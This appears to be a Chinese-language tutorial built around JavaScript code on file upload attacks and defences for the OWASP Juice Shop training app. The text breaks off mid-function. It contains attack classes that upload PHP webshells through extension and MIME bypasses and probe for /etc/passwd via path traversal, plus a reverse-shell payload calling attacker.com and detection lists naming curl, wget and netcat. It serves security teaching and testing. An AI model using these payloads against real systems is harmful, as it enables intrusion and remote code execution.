OWASP Juice Shop - 文件上传漏洞深度挖掘：从绕过技术到企业级防护架构

// Juice Shop 文件上传接口（存在安全漏洞）
app.post('/file-upload', upload.single('file'), (req, res) => {
    const file = req.file;
    
    // 问题1：只检查文件扩展名，可被双扩展名绕过
    const allowedExtensions = ['.jpg', '.png', '.gif'];
    const fileExtension = path.extname(file.originalname).toLowerCase();
    
    if (!allowedExtensions.includes(fileExtension)) {
        return res.status(400).json({ error: 'Invalid file type' });
    }
    
    // 问题2：使用原始文件名，可包含路径遍历字符
    const uploadPath = path.join(__dirname, 'uploads', file.originalname);
    
    // 问题3：上传目录可执行，没有权限隔离
    fs.writeFileSync(uploadPath, file.buffer);
    
    // 问题4：没有文件内容验证，只检查MIME类型
    res.json({ 
        message: 'File uploaded successfully',
        filename: file.originalname 
    });
});

// 扩展名绕过攻击框架
class ExtensionBypassAttacker {
    constructor(targetUrl) {
        this.targetUrl = targetUrl;
        this.bypassTechniques = [];
    }
    
    /**
     * 双扩展名绕过
     */
    doubleExtensionBypass() {
        const payloads = [
            'shell.jpg.php',
            'backdoor.png.php5',
            'webshell.gif.phtml',
            'malicious.jpeg.php7'
        ];
        
        return payloads.map(filename => ({
            filename,
            technique: 'double_extension',
            description: '使用双扩展名绕过简单扩展名检查'
        }));
    }
    
    /**
     * 大小写绕过
     */
    caseBypass() {
        const payloads = [
            'shell.PHP',
            'backdoor.Php5',
            'webshell.PHTML',
            'malicious.PhAr'
        ];
        
        return payloads.map(filename => ({
            filename,
            technique: 'case_sensitivity',
            description: '利用大小写敏感绕过黑名单检查'
        }));
    }
    
    /**
     * 空字节截断绕过（旧版本PHP）
     */
    nullByteBypass() {
        const payloads = [
            'shell.php\x00.jpg',
            'backdoor.php5\x00.png',
            'webshell.phtml\x00.gif'
        ];
        
        return payloads.map(filename => ({
            filename: Buffer.from(filename),
            technique: 'null_byte_injection',
            description: '使用空字节截断绕过扩展名检查'
        }));
    }
    
    /**
     * 特殊字符绕过
     */
    specialCharBypass() {
        const payloads = [
            'shell.php.',
            'backdoor.php::$DATA',
            'webshell.php ',
            'malicious.php%20'
        ];
        
        return payloads.map(filename => ({
            filename,
            technique: 'special_character',
            description: '使用特殊字符绕过文件名检查'
        }));
    }
    
    /**
     * 超长文件名绕过
     */
    longFilenameBypass() {
        const baseName = 'a'.repeat(250) + '.php';
        return [{
            filename: baseName,
            technique: 'long_filename',
            description: '使用超长文件名绕过文件系统限制'
        }];
    }
    
    /**
     * 执行完整的扩展名绕过测试
     */
    async runExtensionBypassTest() {
        const techniques = [
            this.doubleExtensionBypass(),
            this.caseBypass(),
            this.nullByteBypass(),
            this.specialCharBypass(),
            this.longFilenameBypass()
        ];
        
        const results = [];
        
        for (const technique of techniques) {
            for (const payload of technique) {
                const result = await this.testUpload(payload);
                results.push({
                    ...payload,
                    result: result
                });
            }
        }
        
        return results;
    }
    
    /**
     * 测试文件上传
     */
    async testUpload(payload) {
        try {
            const formData = new FormData();
            const maliciousContent = '<?php system($_GET["cmd"]); ?>';
            
            formData.append('file', new Blob([maliciousContent]), payload.filename);
            
            const response = await fetch(this.targetUrl, {
                method: 'POST',
                body: formData
            });
            
            return {
                success: response.ok,
                status: response.status,
                response: await response.text()
            };
        } catch (error) {
            return {
                success: false,
                error: error.message
            };
        }
    }
}

// MIME类型绕过攻击
class MIMEBypassAttacker {
    constructor(targetUrl) {
        this.targetUrl = targetUrl;
    }
    
    /**
     * 伪造常见图片MIME类型
     */
    getMIMETypes() {
        return [
            'image/jpeg',
            'image/png',
            'image/gif',
            'image/bmp',
            'image/webp'
        ];
    }
    
    /**
     * 生成图片文件头
     */
    generateImageHeaders(imageType) {
        const headers = {
            'image/jpeg': Buffer.from([0xFF, 0xD8, 0xFF]),
            'image/png': Buffer.from([0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A]),
            'image/gif': Buffer.from([0x47, 0x49, 0x46, 0x38]),
            'image/bmp': Buffer.from([0x42, 0x4D])
        };
        
        return headers[imageType] || headers['image/jpeg'];
    }
    
    /**
     * 创建混合内容文件
     */
    createHybridFile(mimeType, phpCode) {
        const imageHeader = this.generateImageHeaders(mimeType);
        const phpCodeBuffer = Buffer.from(phpCode);
        
        return Buffer.concat([imageHeader, phpCodeBuffer]);
    }
    
    /**
     * 执行MIME绕过攻击
     */
    async executeMIMEBypass() {
        const results = [];
        const mimeTypes = this.getMIMETypes();
        const phpCode = '<?php @eval($_POST["cmd"]); ?>';
        
        for (const mimeType of mimeTypes) {
            const hybridContent = this.createHybridFile(mimeType, phpCode);
            
            const formData = new FormData();
            const blob = new Blob([hybridContent], { type: mimeType });
            formData.append('file', blob, 'image.php');
            
            try {
                const response = await fetch(this.targetUrl, {
                    method: 'POST',
                    headers: {
                        'Content-Type': mimeType
                    },
                    body: formData
                });
                
                results.push({
                    mimeType,
                    success: response.ok,
                    status: response.status,
                    response: await response.text()
                });
            } catch (error) {
                results.push({
                    mimeType,
                    success: false,
                    error: error.message
                });
            }
        }
        
        return results;
    }
}

// 路径遍历攻击框架
class PathTraversalAttacker {
    constructor(baseUrl) {
        this.baseUrl = baseUrl;
        this.encodingTechniques = [];
    }
    
    /**
     * 基础路径遍历载荷
     */
    getBasicTraversalPayloads() {
        return [
            '../../../etc/passwd',
            '..\\..\\..\\windows\\system32\\drivers\\etc\\hosts',
            '....//....//....//etc/passwd',
            '..%2f..%2f..%2fetc/passwd',
            '..%5c..%5c..%5cwindows\\system32\\drivers\\etc\\hosts'
        ];
    }
    
    /**
     * 编码绕过载荷
     */
    getEncodedPayloads() {
        const base = '../../../etc/passwd';
        
        return [
            // URL编码
            encodeURI(base),
            encodeURIComponent(base),
            
            // 双重URL编码
            encodeURI(encodeURI(base)),
            encodeURIComponent(encodeURIComponent(base)),
            
            // 十六进制编码
            base.split('').map(char => 
                char === '.' ? '%2e' : char === '/' ? '%2f' : char
            ).join(''),
            
            // Unicode编码
            base.split('').map(char => 
                `\\u${char.charCodeAt(0).toString(16).padStart(4, '0')}`
            ).join('')
        ];
    }
    
    /**
     * 混合编码载荷
     */
    getMixedEncodedPayloads() {
        const payloads = [];
        const base = '../../../etc/passwd';
        
        // 混合URL编码和普通字符
        for (let i = 0; i < base.length; i++) {
            if (i % 2 === 0) {
                payloads.push(
                    base.substring(0, i) + 
                    encodeURIComponent(base[i]) + 
                    base.substring(i + 1)
                );
            }
        }
        
        return payloads;
    }
    
    /**
     * NULL字节注入
     */
    getNullBytePayloads() {
        return [
            '../../../etc/passwd\x00.jpg',
            '../../../etc/passwd%00.jpg',
            '..\\..\\..\\windows\\system32\\drivers\\etc\\hosts\x00.txt'
        ];
    }
    
    /**
     * 执行路径遍历攻击
     */
    async executePathTraversal() {
        const allPayloads = [
            ...this.getBasicTraversalPayloads(),
            ...this.getEncodedPayloads(),
            ...this.getMixedEncodedPayloads(),
            ...this.getNullBytePayloads()
        ];
        
        const results = [];
        
        for (const payload of allPayloads) {
            const result = await this.testTraversal(payload);
            results.push({
                payload,
                result
            });
        }
        
        return results;
    }
    
    /**
     * 测试单个路径遍历载荷
     */
    async testTraversal(payload) {
        try {
            const url = `${this.baseUrl}/file?path=${encodeURIComponent(payload)}`;
            const response = await fetch(url);
            
            const text = await response.text();
            
            // 检查是否成功读取了文件内容
            const indicators = [
                'root:x:0:0',  // Linux passwd文件特征
                'localhost',   // Windows hosts文件特征
                'bin/bash',    // shell特征
                'FOR16'        // Windows特征
            ];
            
            const isSuccessful = indicators.some(indicator => 
                text.includes(indicator)
            );
            
            return {
                success: response.ok && isSuccessful,
                status: response.status,
                contentLength: text.length,
                hasSensitiveData: isSuccessful
            };
        } catch (error) {
            return {
                success: false,
                error: error.message
            };
        }
    }
}

// 企业级文件上传防护系统
class EnterpriseFileUploadProtection {
    constructor(options = {}) {
        this.config = {
            uploadDir: options.uploadDir || './uploads',
            maxFileSize: options.maxFileSize || 10 * 1024 * 1024, // 10MB
            allowedMimeTypes: options.allowedMimeTypes || [
                'image/jpeg', 'image/png', 'image/gif'
            ],
            allowedExtensions: options.allowedExtensions || ['.jpg', '.png', '.gif'],
            enableVirusScan: options.enableVirusScan || false,
            enableContentAnalysis: options.enableContentAnalysis || true,
            quarantineDir: options.quarantineDir || './quarantine',
            ...options
        };
        
        this.virusScanner = new VirusScanner();
        this.contentAnalyzer = new ContentAnalyzer();
        this.fileMonitor = new FileMonitor();
        
        this.initializeDirectories();
    }
    
    /**
     * 初始化目录结构
     */
    initializeDirectories() {
        const fs = require('fs');
        const path = require('path');
        
        // 创建上传目录
        if (!fs.existsSync(this.config.uploadDir)) {
            fs.mkdirSync(this.config.uploadDir, { recursive: true });
        }
        
        // 创建隔离目录
        if (!fs.existsSync(this.config.quarantineDir)) {
            fs.mkdirSync(this.config.quarantineDir, { recursive: true });
        }
        
        // 设置上传目录权限（不可执行）
        fs.chmodSync(this.config.uploadDir, 0o755);
    }
    
    /**
     * 安全文件上传处理
     */
    async handleFileUpload(file, userContext) {
        const validationResult = await this.validateFile(file);
        
        if (!validationResult.isValid) {
            return {
                success: false,
                error: validationResult.error,
                code: 'VALIDATION_FAILED'
            };
        }
        
        try {
            // 生成安全的文件名
            const safeFilename = this.generateSafeFilename(file);
            const filePath = this.getSafeFilePath(safeFilename);
            
            // 深度内容分析
            const contentAnalysis = await this.performContentAnalysis(file);
            if (!contentAnalysis.isSafe) {
                await this.quarantineFile(file, contentAnalysis.threats);
                return {
                    success: false,
                    error: 'Malicious content detected',
                    code: 'MALICIOUS_CONTENT'
                };
            }
            
            // 病毒扫描
            if (this.config.enableVirusScan) {
                const virusScanResult = await this.virusScanner.scan(file.buffer);
                if (!virusScanResult.isClean) {
                    await this.quarantineFile(file, ['Virus detected']);
                    return {
                        success: false,
                        error: 'Virus detected',
                        code: 'VIRUS_DETECTED'
                    };
                }
            }
            
            // 安全存储文件
            await this.securelyStoreFile(file.buffer, filePath);
            
            // 记录上传日志
            await this.logUpload(file, safeFilename, userContext);
            
            // 启动文件监控
            this.fileMonitor.watchFile(filePath);
            
            return {
                success: true,
                filename: safeFilename,
                path: filePath,
                size: file.buffer.length,
                mimeType: file.mimetype
            };
            
        } catch (error) {
            return {
                success: false,
                error: 'Upload failed: ' + error.message,
                code: 'UPLOAD_ERROR'
            };
        }
    }
    
    /**
     * 文件验证
     */
    async validateFile(file) {
        // 1. 文件大小检查
        if (file.buffer.length > this.config.maxFileSize) {
            return {
                isValid: false,
                error: 'File size exceeds limit'
            };
        }
        
        // 2. MIME类型检查
        if (!this.config.allowedMimeTypes.includes(file.mimetype)) {
            return {
                isValid: false,
                error: 'MIME type not allowed'
            };
        }
        
        // 3. 扩展名检查
        const extension = this.getFileExtension(file.originalname);
        if (!this.config.allowedExtensions.includes(extension)) {
            return {
                isValid: false,
                error: 'File extension not allowed'
            };
        }
        
        // 4. MIME与扩展名一致性检查
        const detectedMime = await this.detectMimeType(file.buffer);
        if (detectedMime !== file.mimetype) {
            return {
                isValid: false,
                error: 'MIME type mismatch'
            };
        }
        
        // 5. 文件名安全检查
        if (!this.isFilenameSafe(file.originalname)) {
            return {
                isValid: false,
                error: 'Unsafe filename'
            };
        }
        
        return { isValid: true };
    }
    
    /**
     * 生成安全文件名
     */
    generateSafeFilename(file) {
        const crypto = require('crypto');
        const path = require('path');
        
        // 获取文件扩展名
        const extension = this.getFileExtension(file.originalname);
        
        // 生成随机文件名
        const randomBytes = crypto.randomBytes(16).toString('hex');
        const timestamp = Date.now();
        
        return `${timestamp}_${randomBytes}${extension}`;
    }
    
    /**
     * 获取安全文件路径
     */
    getSafeFilePath(filename) {
        const path = require('path');
        
        // 按日期创建子目录
        const date = new Date();
        const year = date.getFullYear();
        const month = String(date.getMonth() + 1).padStart(2, '0');
        const day = String(date.getDate()).padStart(2, '0');
        
        const subDir = path.join(year.toString(), month, day);
        const fullPath = path.join(this.config.uploadDir, subDir);
        
        // 确保目录存在
        const fs = require('fs');
        if (!fs.existsSync(fullPath)) {
            fs.mkdirSync(fullPath, { recursive: true });
        }
        
        return path.join(fullPath, filename);
    }
    
    /**
     * 深度内容分析
     */
    async performContentAnalysis(file) {
        const threats = [];
        const content = file.buffer.toString('binary');
        
        // 1. 检查WebShell特征
        const webshellPatterns = [
            /<\?php/i,
            /<%\s*=/i,
            /<script[^>]*>.*?<\/script>/gi,
            /eval\s*\(/i,
            /system\s*\(/i,
            /exec\s*\(/i,
            /shell_exec\s*\(/i,
            /passthru\s*\(/i
        ];
        
        for (const pattern of webshellPatterns) {
            if (pattern.test(content)) {
                threats.push('Potential webshell code detected');
                break;
            }
        }
        
        // 2. 检查可疑字符串
        const suspiciousStrings = [
            'cmd.exe',
            '/bin/sh',
            'powershell',
            'bash -c',
            'wget ',
            'curl ',
            'nc ',
            'netcat'
        ];
        
        for (const str of suspiciousStrings) {
            if (content.toLowerCase().includes(str.toLowerCase())) {
                threats.push(`Suspicious string detected: ${str}`);
            }
        }
        
        // 3. 文件结构分析
        if (this.config.enableContentAnalysis) {
            const structureAnalysis = await this.contentAnalyzer.analyze(file.buffer);
            if (structureAnalysis.threats.length > 0) {
                threats.push(...structureAnalysis.threats);
            }
        }
        
        return {
            isSafe: threats.length === 0,
            threats
        };
    }
    
    /**
     * 隔离恶意文件
     */
    async quarantineFile(file, threats) {
        const fs = require('fs');
        const path = require('path');
        const crypto = require('crypto');
        
        const quarantineId = crypto.randomBytes(8).toString('hex');
        const quarantinePath = path.join(
            this.config.quarantineDir, 
            `${quarantineId}_${file.originalname}`
        );
        
        // 保存隔离文件
        fs.writeFileSync(quarantinePath, file.buffer);
        
        // 记录隔离信息
        const quarantineInfo = {
            id: quarantineId,
            originalName: file.originalname,
            size: file.buffer.length,
            mimeType: file.mimetype,
            threats: threats,
            timestamp: new Date().toISOString(),
            quarantinePath: quarantinePath
        };
        
        const infoPath = path.join(
            this.config.quarantineDir, 
            `${quarantineId}_info.json`
        );
        
        fs.writeFileSync(infoPath, JSON.stringify(quarantineInfo, null, 2));
        
        console.warn(`File quarantined: ${file.originalname}`, threats);
    }
    
    /**
     * 安全存储文件
     */
    async securelyStoreFile(buffer, filePath) {
        const fs = require('fs');
        
        // 写入文件
        fs.writeFileSync(filePath, buffer);
        
        // 设置文件权限（只读）
        fs.chmodSync(filePath, 0o644);
    }
    
    /**
     * 获取文件扩展名
     */
    getFileExtension(filename) {
        const path = require('path');
        return path.extname(filename).toLowerCase();
    }
    
    /**
     * 检测文件MIME类型
     */
    async detectMimeType(buffer) {
        const fileType = require('file-type');
        const result = await fileType.fromBuffer(buffer);
        return result ? result.mime : 'application/octet-stream';
    }
    
    /**
     * 检查文件名安全性
     */
    isFilenameSafe(filename) {
        // 检查路径遍历
        if (filename.includes('../') || filename.includes('..\\')) {
            return false;
        }
        
        // 检查特殊字符
        const dangerousChars = ['<', '>', ':', '"', '|', '?', '*', '\0'];
        for (const char of dangerousChars) {
            if (filename.includes(char)) {
                return false;
            }
        }
        
        // 检查文件名长度
        if (filename.length > 255) {
            return false;
        }
        
        return true;
    }
    
    /**
     * 记录上传日志
     */
    async logUpload(file, safeFilename, userContext) {
        const logEntry = {
            timestamp: new Date().toISOString(),
            originalName: file.originalname,
            safeName: safeFilename,
            size: file.buffer.length,
            mimeType: file.mimetype,
            userId: userContext.userId,
            ipAddress: userContext.ipAddress,
            userAgent: userContext.userAgent
        };
        
        console.log('File upload log:', JSON.stringify(logEntry, null, 2));
    }
}

// 安全路径处理系统
class SecurePathHandler {
    constructor(allowedBasePaths) {
        this.allowedBasePaths = allowedBasePaths || [];
        this.pathCache = new Map();
    }
    
    /**
     * 安全路径拼接
     */
    safeJoin(basePath, userPath) {
        const path = require('path');
        
        // 规范化路径
        const normalizedBase = path.resolve(basePath);
        const normalizedUser = path.resolve(normalizedBase, userPath);
        
        // 检查是否在允许的基础路径内
        if (!normalizedUser.startsWith(normalizedBase)) {
            throw new Error('Path traversal detected');
        }
        
        // 检查是否在允许的基础路径列表中
        for (const allowedPath of this.allowedBasePaths) {
            const normalizedAllowed = path.resolve(allowedPath);
            if (normalizedUser.startsWith(normalizedAllowed)) {
                return normalizedUser;
            }
        }
        
        throw new Error('Path not in allowed directories');
    }
    
    /**
     * 验证路径安全性
     */
    validatePath(userPath) {
        // 检查路径遍历模式
        const traversalPatterns = [
            /\.\.[\/\\]/,           // ../
            /\.[\/\\]\./,           // ./.
            /[\/\\]\.\.[\/\\]/,     //../
            /%2e%2e[\/\\]/i,        // URL编码的../
            /%252e%252e[\/\\]/i,    // 双重URL编码的../
            /\x2e\x2e[\/\\]/,       // 十六进制编码的../
            /\u002e\u002e[\/\\]/     // Unicode编码的../
        ];
        
        for (const pattern of traversalPatterns) {
            if (pattern.test(userPath)) {
                return false;
            }
        }
        
        // 检查空字节注入
        if (userPath.includes('\0') || userPath.includes('%00')) {
            return false;
        }
        
        // 检查路径长度
        if (userPath.length > 4096) {
            return false;
        }
        
        return true;
    }
    
    /**
     * 解码并验证路径
     */
    decodeAndValidatePath(encodedPath) {
        try {
            // 多层解码
            let decodedPath = decodeURIComponent(encodedPath);
            
            // 如果仍然是编码状态，继续解码
            while (decodedPath !== decodeURIComponent(decodedPath)) {
                decodedPath = decodeURIComponent(decodedPath);
            }
            
            // 验证解码后的路径
            if (!this.validatePath(decodedPath)) {
                throw new Error('Invalid path detected');
            }
            
            return decodedPath;
        } catch (error) {
            throw new Error('Path decoding failed: ' + error.message);
        }
    }
    
    /**
     * Express中间件
     */
    middleware() {
        return (req, res, next) => {
            if (req.query.path) {
                try {
                    const safePath = this.decodeAndValidatePath(req.query.path);
                    req.safePath = safePath;
                } catch (error) {
                    return res.status(400).json({ error: 'Invalid path' });
                }
            }
            
            next();
        };
    }
}

// 文件内容分析引擎
class ContentAnalyzer {
    constructor() {
        this.signatures = new Map();
        this.loadSignatures();
    }
    
    /**
     * 加载文件特征签名
     */
    loadSignatures() {
        // WebShell特征签名
        this.signatures.set('webshell', [
            { pattern: /<\?php\s+eval/i, severity: 'high' },
            { pattern: /<\?php\s+system/i, severity: 'high' },
            { pattern: /<\?php\s+exec/i, severity: 'high' },
            { pattern: /<\?php\s+passthru/i, severity: 'high' },
            { pattern: /<\?php\s+shell_exec/i, severity: 'high' },
            { pattern: /<%\s*=/i, severity: 'medium' },
            { pattern: /<script[^>]*runat\s*=\s*["']server["']/i, severity: 'high' }
        ]);
        
        // 恶意脚本特征
        this.signatures.set('malicious_script', [
            { pattern: /document\.write\s*\(\s*.*?eval/i, severity: 'high' },
            { pattern: /setInterval\s*\(\s*.*?eval/i, severity: 'high' },
            { pattern: /setTimeout\s*\(\s*.*?eval/i, severity: 'high' },
            { pattern: /Function\s*\(\s*["'].*?eval/i, severity: 'high' }
        ]);
        
        // 可疑字符串
        this.signatures.set('suspicious_strings', [
            { pattern: /cmd\.exe/i, severity: 'medium' },
            { pattern: /powershell/i, severity: 'medium' },
            { pattern: /\/bin\/sh/i, severity: 'medium' },
            { pattern: /bash\s+-c/i, severity: 'medium' },
            { pattern: /wget\s+http/i, severity: 'medium' },
            { pattern: /curl\s+http/i, severity: 'medium' }
        ]);
    }
    
    /**
     * 分析文件内容
     */
    async analyze(buffer) {
        const threats = [];
        const content = buffer.toString('binary');
        
        // 1. 基于签名的检测
        const signatureThreats = this.signatureDetection(content);
        threats.push(...signatureThreats);
        
        // 2. 文件结构分析
        const structureThreats = this.structureAnalysis(buffer);
        threats.push(...structureThreats);
        
        // 3. 行为分析
        const behaviorThreats = this.behaviorAnalysis(content);
        threats.push(...behaviorThreats);
        
        // 4. 启发式分析
        const heuristicThreats = this.heuristicAnalysis(buffer);
        threats.push(...heuristicThreats);
        
        return {
            threats,
            riskScore: this.calculateRiskScore(threats),
            isSafe: threats.length === 0
        };
    }
    
    /**
     * 基于签名的检测
     */
    signatureDetection(content) {
        const threats = [];
        
        for (const [category, signatures] of this.signatures) {
            for (const signature of signatures) {
                if (signature.pattern.test(content)) {
                    threats.push({
                        type: category,
                        severity: signature.severity,
                        pattern: signature.pattern.toString(),
                        description: `Suspicious pattern detected: ${category}`
                    });
                }
            }
        }
        
        return threats;
    }
    
    /**
     * 文件结构分析
     */
    structureAnalysis(buffer) {
        const threats = [];
        
        // 检查文件头是否与扩展名匹配
        const fileHeader = buffer.slice(0, 16);
        const detectedType = this.detectFileType(fileHeader);
        
        // 如果检测到可执行文件但扩展名是图片类型
        if (detectedType === 'executable' && this.isImageExtension(buffer)) {
            threats.push({
                type: 'structure_mismatch',
                severity: 'high',
                description: 'Executable file disguised as image'
            });
        }
        
        // 检查是否有隐藏的代码段
        const hiddenCode = this.detectHiddenCode(buffer);
        if (hiddenCode.length > 0) {
            threats.push({
                type: 'hidden_code',
                severity: 'medium',
                description: 'Hidden code segments detected'
            });
        }
        
        return threats;
    }
    
    /**
     * 行为分析
     */
    behaviorAnalysis(content) {
        const threats = [];
        
        // 检查网络连接行为
        const networkPatterns = [
            /fopen\s*\(\s*["']http/i,
            /file_get_contents\s*\(\s*["']http/i,
            /curl_init/i,
            /new\s+XMLHttpRequest/i
        ];
        
        for (const pattern of networkPatterns) {
            if (pattern.test(content)) {
                threats.push({
                    type: 'network_behavior',
                    severity: 'medium',
                    description: 'Potential network communication detected'
                });
                break;
            }
        }
        
        // 检查文件系统操作
        const fileSystemPatterns = [
            /unlink\s*\(/i,
            /rmdir\s*\(/i,
            /rename\s*\(/i,
            /copy\s*\(/i
        ];
        
        for (const pattern of fileSystemPatterns) {
            if (pattern.test(content)) {
                threats.push({
                    type: 'file_system_manipulation',
                    severity: 'medium',
                    description: 'File system manipulation detected'
                });
                break;
            }
        }
        
        return threats;
    }
    
    /**
     * 启发式分析
     */
    heuristicAnalysis(buffer) {
        const threats = [];
        const content = buffer.toString('binary');
        
        // 检查熵值（高熵值可能表示加密或压缩的恶意代码）
        const entropy = this.calculateEntropy(buffer);
        if (entropy > 7.5) {
            threats.push({
                type: 'high_entropy',
                severity: 'low',
                description: 'High entropy content detected'
            });
        }
        
        // 检查字符串分布
        const stringAnalysis = this.analyzeStringDistribution(content);
        if (stringAnalysis.suspicious) {
            threats.push({
                type: 'suspicious_strings',
                severity: 'low',
                description: 'Suspicious string distribution'
            });
        }
        
        return threats;
    }
    
    /**
     * 检测文件类型
     */
    detectFileType(header) {
        // JPEG
        if (header[0] === 0xFF && header[1] === 0xD8) {
            return 'image';
        }
        
        // PNG
        if (header.toString('hex', 0, 8) === '89504e470d0a1a0a') {
            return 'image';
        }
        
        // PE executable
        if (header.toString('hex', 0, 2) === '4d5a') {
            return 'executable';
        }
        
        // ELF executable
        if (header.toString('hex', 0, 4) === '7f454c46') {
            return 'executable';
        }
        
        return 'unknown';
    }
    
    /**
     * 检测隐藏代码
     */
    detectHiddenCode(buffer) {
        const hiddenCode = [];
        
        // 检查文件末尾是否有附加代码
        const tail = buffer.slice(-1024);
        const tailStr = tail.toString('binary');
        
        if (/<\?php|<%|<script/i.test(tailStr)) {
            hiddenCode.push('Code found at end of file');
        }
        
        // 检查EXIF数据中的代码
        if (this.isImageFile(buffer)) {
            const exifCode = this.extractExifCode(buffer);
            if (exifCode.length > 0) {
                hiddenCode.push(...exifCode);
            }
        }
        
        return hiddenCode;
    }
    
    /**
     * 计算风险评分
     */
    calculateRiskScore(threats) {
        const severityWeights = {
            high: 10,
            medium: 5,
            low: 1
        };
        
        return threats.reduce((score, threat) => {
            return score + (severityWeights[threat.severity] || 0);
        }, 0);
    }
    
    /**
     * 计算文件熵值
     */
    calculateEntropy(buffer) {
        const frequency = new Array(256).fill(0);
        
        // 统计字节频率
        for (let i = 0; i < buffer.length; i++) {
            frequency[buffer[i]]++;
        }
        
        // 计算熵值
        let entropy = 0;
        for (let i = 0; i < 256; i++) {
            if (frequency[i] > 0) {
                const probability = frequency[i] / buffer.length;
                entropy -= probability * Math.log2(probability);
            }
        }
        
        return entropy;
    }
    
    /**
     * 分析字符串分布
     */
    analyzeStringDistribution(content) {
        const strings = content.match(/[\x20-\x7E]{4,}/g) || [];
        const totalLength = strings.reduce((sum, str) => sum + str.length, 0);
        const averageLength = strings.length > 0 ? totalLength / strings.length : 0;
        
        return {
            suspicious: averageLength > 50 || strings.length > 100
        };
    }
    
    /**
     * 检查是否为图片文件
     */
    isImageFile(buffer) {
        return this.detectFileType(buffer) === 'image';
    }
    
    /**
     * 检查是否为图片扩展名
     */
    isImageExtension(buffer) {
        // 这里简化处理，实际应该根据文件扩展名判断
        return true;
    }
    
    /**
     * 从EXIF数据中提取代码
     */
    extractExifCode(buffer) {
        // 简化实现，实际需要解析EXIF数据结构
        const code = [];
        const content = buffer.toString('binary');
        
        if (/<\?php|<%|<script/i.test(content)) {
            code.push('Potential code in EXIF data');
        }
        
        return code;
    }
}

// 文件上传安全测试框架
class FileUploadSecurityTester {
    constructor(targetUrl) {
        this.targetUrl = targetUrl;
        this.testResults = [];
        this.attackPayloads = [];
    }
    
    /**
     * 运行完整的文件上传安全测试
     */
    async runFullTestSuite() {
        console.log('开始文件上传安全测试...');
        
        // 1. 扩展名绕过测试
        await this.testExtensionBypass();
        
        // 2. MIME类型绕过测试
        await this.testMIMEBypass();
        
        // 3. 路径遍历测试
        await this.testPathTraversal();
        
        // 4. 文件内容攻击测试
        await this.testMaliciousContent();
        
        // 5. 文件大小限制测试
        await this.testFileSizeLimits();
        
        // 6. 并发上传测试
        await this.testConcurrentUploads();
        
        return this.generateTestReport();
    }
    
    /**
     * 扩展名绕过测试
     */
    async testExtensionBypass() {
        console.log('测试扩展名绕过...');
        
        const bypassTechniques = [
            { filename: 'shell.jpg.php', technique: 'double_extension' },
            { filename: 'backdoor.PHP', technique: 'case_bypass' },
            { filename: 'webshell.php5', technique: 'alternative_extension' },
            { filename: 'malicious.php.', technique: 'trailing_dot' },
            { filename: 'evil.php%00.jpg', technique: 'null_byte_injection' }
        ];
        
        for (const technique of bypassTechniques) {
            const result = await this.testFileUpload(technique);
            this.testResults.push({
                test: `Extension bypass: ${technique.technique}`,
                status: result.success ? 'VULNERABLE' : 'PROTECTED',
                details: result
            });
        }
    }
    
    /**
     * MIME类型绕过测试
     */
    async testMIMEBypass() {
        console.log('测试MIME类型绕过...');
        
        const mimeTests = [
            { content: '<?php system($_GET["cmd"]); ?>', mimeType: 'image/jpeg' },
            { content: '<%@ page import="java.io.*" %>', mimeType: 'image/png' },
            { content: '<% eval request("cmd") %>', mimeType: 'image/gif' }
        ];
        
        for (const test of mimeTests) {
            const result = await this.testFileUpload({
                filename: 'test.jpg',
                content: test.content,
                mimeType: test.mimeType,
                technique: 'mime_spoofing'
            });
            
            this.testResults.push({
                test: 'MIME type spoofing',
                status: result.success ? 'VULNERABLE' : 'PROTECTED',
                details: result
            });
        }
    }
    
    /**
     * 路径遍历测试
     */
    async testPathTraversal() {
        console.log('测试路径遍历...');
        
        const pathTraversalTests = [
            '../../../etc/passwd',
            '..%2f..%2f..%2fetc/passwd',
            '..\\..\\..\\windows\\system32\\drivers\\etc\\hosts',
            '....//....//....//etc/passwd'
        ];
        
        for (const path of pathTraversalTests) {
            const result = await this.testFileAccess(path);
            this.testResults.push({
                test: `Path traversal: ${path}`,
                status: result.success ? 'VULNERABLE' : 'PROTECTED',
                details: result
            });
        }
    }
    
    /**
     * 恶意内容测试
     */
    async testMaliciousContent() {
        console.log('测试恶意内容...');
        
        const maliciousContents = [
            '<?php @eval($_POST["cmd"]); ?>',
            '<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>',
            '<%@ page import="java.io.*" %><% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
            '#!/bin/bash\nbash -i >& /dev/tcp/attacker.com/4444 0>&1'
        ];
        
        for (const content of maliciousContents) {
            const result = await this.testFileUpload({
                filename: 'test.jpg',
                content: content,
                mimeType: 'image/jpeg',
                technique: 'malicious_content'
            });
            
            this.testResults.push({
                test: 'Malicious content detection',
                status: result.success ? 'VULNERABLE' : 'PROTECTED',
                details: result
            });
        }
    }
    
    /**
     * 文件大小限制测试
     */
    async testFileSizeLimits() {
        console.log('测试文件大小限制...');
        
        const sizes = [
            { size: 1024 * 1024, name: '1MB' },
            { size: 10 * 1024 * 1024, name: '10MB' },
            { size: 100 * 1024 * 1024, name: '100MB' },
            { size: 1024 * 1024 * 1024, name: '1GB' }
        ];
        
        for (const sizeTest of sizes) {
            const largeContent = 'A'.repeat(sizeTest.size);
            const result = await this.testFileUpload({
                filename: 'large.jpg',
                content: largeContent,
                mimeType: 'image/jpeg',
                technique: 'size_limit'
            });
            
            this.testResults.push({
                test: `File size limit: ${sizeTest.name}`,
                status: result.success ? 'VULNERABLE' : 'PROTECTED',
                details: result
            });
        }
    }
    
    /**
     * 并发上传测试
     */
    async testConcurrentUploads() {
        console.log('测试并发上传...');
        
        const concurrentUploads = 50;
        const uploadPromises = [];
        
        for (let i = 0; i < concurrentUploads; i++) {
            uploadPromises.push(this.testFileUpload({
                filename: `concurrent_${i}.jpg`,
                content: `Test content ${i}`,
                mimeType: 'image/jpeg',
                technique: 'concurrent_upload'
            }));
        }
        
        const results = await Promise.allSettled(uploadPromises);
        const successfulUploads = results.filter(r => 
            r.status === 'fulfilled' && r.value.success
        ).length;
        
        this.testResults.push({
            test: 'Concurrent uploads',
            status: successfulUploads > concurrentUploads * 0.8 ? 'VULNERABLE' : 'PROTECTED',
            details: {
                totalRequests: concurrentUploads,
                successfulUploads,
                successRate: (successfulUploads / concurrentUploads * 100).toFixed(2) + '%'
            }
        });
    }
    
    /**
     * 测试文件上传
     */
    async testFileUpload(testCase) {
        try {
            const formData = new FormData();
            const blob = new Blob([testCase.content || 'test content'], {
                type: testCase.mimeType || 'image/jpeg'
            });
            
            formData.append('file', blob, testCase.filename);
            
